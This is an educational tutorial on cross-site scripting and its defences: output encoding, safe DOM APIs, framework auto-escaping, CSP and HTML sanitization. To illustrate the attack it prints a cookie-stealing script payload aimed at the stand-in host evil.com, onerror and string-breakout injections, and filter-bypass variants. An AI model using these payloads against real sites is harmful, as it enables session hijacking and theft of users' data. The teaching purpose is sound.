XSS & Output Encoding

Cross-Site Scripting (XSS) is the most common web vulnerability. It occurs when an attacker injects malicious scripts into a web page viewed by other users. The victim's browser executes the script because it trusts content served by the website. The fix is output encoding: transforming special characters so the browser renders them as text, not code.

How XSS Works

XSS exploits the fact that browsers cannot distinguish between legitimate scripts and injected ones. If a web page includes user-controlled content without encoding it, an attacker can inject JavaScript that runs in the context of another user's session.

// A comment feature that displays user input directly
<div class="comment">
  USER_INPUT_HERE
</div>

// Normal input: "Great article!"
// Rendered: <div class="comment">Great article!</div>

// Malicious input: <script>document.location='https://evil.com/steal?c='+document.cookie</script>
// Rendered: <div class="comment"><script>document.location='https://evil.com/steal?c='+document.cookie</script></div>
// The browser executes the script, sending the victim's cookies to the attacker

The attacker now has the victim's session cookie and can impersonate them.

Three Types of XSS

Stored XSS (Persistent)

The malicious script is saved to the server (in a database, file, or cache) and served to every user who views the affected page. This is the most dangerous type because it attacks all users automatically.

Attack flow:
1. Attacker submits a comment containing a script tag
2. Server stores the comment in the database
3. When any user loads the page, the server includes the stored comment
4. The victim's browser executes the script
5. Every user who views the page is compromised

Common targets:
- Comment sections, forum posts, user profiles
- Product reviews, support tickets
- Any feature that stores and displays user content

Reflected XSS (Non-Persistent)

The malicious script is included in a URL or form submission and reflected back in the server's response. The attacker must trick the victim into clicking a crafted link.

// Vulnerable search page
// URL: https://example.com/search?q=USER_INPUT
// Response: <p>Results for: USER_INPUT</p>

// Attacker crafts URL:
// https://example.com/search?q=<script>steal_cookies()</script>
// Sends link to victim via email or social media

// When victim clicks, the server reflects the script in the response
// The browser executes it in the context of example.com

DOM-Based XSS

The vulnerability exists entirely in client-side JavaScript. The server never sees the malicious payload. The browser's DOM is manipulated directly.

// Vulnerable JavaScript code
const hash = window.location.hash.substring(1);
document.getElementById('output').innerHTML = hash;

// Attacker crafts URL:
// https://example.com/page#<img src=x onerror=steal_cookies()>

// The server returns the same page regardless
// The client-side JavaScript reads the hash and inserts it into the DOM
// The browser executes the onerror handler

DOM-based XSS is harder to detect because the payload never appears in server logs. It exists only in the browser.

The Fix: Context-Aware Output Encoding

The fix for XSS is encoding output based on the context where user data appears. Different contexts require different encoding rules.

HTML Context

When user data appears as HTML content, encode HTML special characters:

Character    Encoded
<            &lt;
>            &gt;
&            &amp;
"            &quot;
'            &#x27;

// Before encoding:
<div>USER_INPUT</div>
// If input is: <script>alert(1)</script>
// Rendered: <script>alert(1)</script>  -> EXECUTES

// After encoding:
<div>&lt;script&gt;alert(1)&lt;/script&gt;</div>
// Rendered as text: <script>alert(1)</script>  -> SAFE, displays as text

JavaScript Context

When user data appears inside a JavaScript string, HTML encoding is not enough. Use JavaScript-specific encoding:

// Dangerous: user data in a JavaScript string
<script>
  var name = "USER_INPUT";
</script>

// Attacker input: "; alert(1); //
// Result: var name = ""; alert(1); //";  -> EXECUTES

// Fix: JavaScript-encode the value (escape quotes, backslashes, newlines)
// Or better: avoid putting user data in inline scripts entirely
// Use data attributes instead:
<div id="user" data-name="ENCODED_USER_INPUT"></div>
<script>
  var name = document.getElementById('user').dataset.name;
</script>

URL & CSS Contexts

When user data appears in a URL, URL-encode it and validate the scheme (only allow http/https — never javascript:). When user data appears in CSS, avoid it entirely if possible, or validate against an allowlist of safe values. Each context has its own injection vectors and requires its own encoding.

innerHTML Is Dangerous

The innerHTML property parses its content as HTML, meaning any script tags or event handlers will execute.

// Dangerous
element.innerHTML = userInput;
// If userInput contains <img src=x onerror=alert(1)>, it executes

// Safe alternatives
element.textContent = userInput;  // Treats input as text, not HTML
element.innerText = userInput;    // Also safe, treats as text

This applies to any DOM API that parses HTML:

// Dangerous DOM APIs
element.innerHTML = data;
element.outerHTML = data;
document.write(data);
document.writeln(data);
element.insertAdjacentHTML('beforeend', data);

// Safe DOM APIs
element.textContent = data;
element.setAttribute('value', data);  // Safe for most attributes
document.createTextNode(data);

Modern Frameworks Auto-Escape by Default

React, Svelte, Vue, and Angular encode output by default. This eliminates most XSS vulnerabilities — but not all.

// React — safe by default
function Comment({ text }) {
  return <div>{text}</div>;
  // React escapes the text automatically
  // <script>alert(1)</script> is rendered as text, not executed
}

// React — dangerous escape hatch
function Comment({ html }) {
  return <div dangerouslySetInnerHTML={{ __html: html }} />;
  // The name is intentionally scary. This bypasses React's encoding.
  // Only use with sanitized content.
}

// Svelte — safe by default
<p>{userInput}</p>
<!-- Svelte escapes userInput automatically -->

// Svelte — dangerous escape hatch
{@html userInput}
<!-- This renders raw HTML. Only use with sanitized content. -->

The pattern: frameworks escape by default, and provide explicitly-named escape hatches for when you need raw HTML. Treat every use of the escape hatch as a potential XSS vector.

Content Security Policy (CSP)

CSP is a defense-in-depth mechanism. It does not fix XSS — encoding does. But CSP limits the damage if encoding fails.

CSP is an HTTP header that tells the browser which scripts, styles, and other resources are allowed to execute.

// Strict CSP — blocks inline scripts and only allows scripts from your domain
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self';

// With nonces — allow specific inline scripts
Content-Security-Policy: script-src 'nonce-abc123';

// In HTML:
<script nonce="abc123">
  // This script runs because its nonce matches the CSP header
  legitimateCode();
</script>

<script>
  // This script is blocked because it has no nonce
  attackerCode();
</script>

CSP also supports report-only mode (Content-Security-Policy-Report-Only) which logs violations without blocking them, useful for rolling out a policy gradually.

Real-World XSS Attacks

2018 — British Airways
- Attackers injected a script into the BA website payment page
- The script captured credit card details as customers typed them
- 380,000 transactions were compromised over two weeks
- BA was fined $230 million under GDPR (later reduced to $26 million)
- The injected script was 22 lines of JavaScript that copied form data
  to a server controlled by the Magecart group

2019 — Fortnite (Epic Games)
- Researchers discovered a stored XSS vulnerability in an old,
  forgotten Epic Games subdomain
- Combined with an OAuth token theft, attackers could take over
  any Fortnite account without knowing the password
- 200 million player accounts were potentially at risk
- The vulnerability was in a page that had not been maintained for years

2005 — MySpace (Samy Worm)
- Samy Kamkar created a self-propagating XSS worm
- When a user viewed Samy's profile, the worm added Samy as a friend
  and copied itself to the viewer's profile
- Within 20 hours, over 1 million users were infected
- MySpace had to shut down to remove the worm

HTML Sanitization

Sometimes you need to allow some HTML (rich text editors, markdown rendering). In these cases, use a well-tested HTML sanitizer — never write your own.

// DOMPurify — the standard client-side sanitizer
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(dirtyHTML);

// DOMPurify removes dangerous elements and attributes:
// Input:  <p>Hello <script>alert(1)</script> <b>world</b></p>
// Output: <p>Hello  <b>world</b></p>

// Configure to allow only specific tags
const clean = DOMPurify.sanitize(dirtyHTML, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p'],
  ALLOWED_ATTR: ['href']
});

Never use regex to strip HTML tags. Attackers know more edge cases than your regex handles.

Common Pitfalls

Encoding in the wrong context. HTML encoding does not protect JavaScript contexts. URL encoding does not protect HTML contexts. You must match the encoding to the context where the data appears.
Trusting client-side validation. Client-side validation improves UX but provides zero security. Attackers bypass it by sending requests directly. Always encode on the server.
Blocklist filtering. Stripping <script> tags is trivially bypassed: <scr<script>ipt>, <SCRIPT>, <img onerror=...>, event handlers, SVG elements, and dozens of other vectors. Use encoding, not blocklists.
Using dangerouslySetInnerHTML or {@html} without sanitization. These escape hatches exist for legitimate use cases, but every use must sanitize its input with a library like DOMPurify first.
Forgetting about DOM-based XSS. Server-side encoding does not help when the vulnerability is in client-side JavaScript. Audit client-side code for dangerous sinks like innerHTML, document.write, and eval.
Thinking CSP replaces encoding. CSP is defense in depth. It reduces the impact of XSS but does not prevent it. A strict CSP can block inline script execution, but encoding should be the primary defense.
Ignoring HTTP-only cookies. Even if XSS cannot steal cookies marked HttpOnly, attackers can still perform actions as the user (CSRF-style attacks via XSS), redirect them, deface the page, or capture keystrokes.

Key Takeaways

XSS occurs when user input is included in web pages without encoding, allowing attacker-controlled scripts to execute in victims' browsers.
There are three types: stored (most dangerous, persists in the database), reflected (requires clicking a link), and DOM-based (entirely client-side).
The fix is context-aware output encoding: HTML encoding for HTML contexts, JavaScript encoding for JS contexts, URL encoding for URLs.
Never use innerHTML with user data. Use textContent instead.
Modern frameworks (React, Svelte, Vue) auto-escape by default. Their escape hatches (dangerouslySetInnerHTML, {@html}) require sanitized input.
CSP is defense in depth that limits what scripts can execute, but encoding is the primary defense.
Real-world XSS attacks have compromised hundreds of millions of accounts and cost companies hundreds of millions of dollars.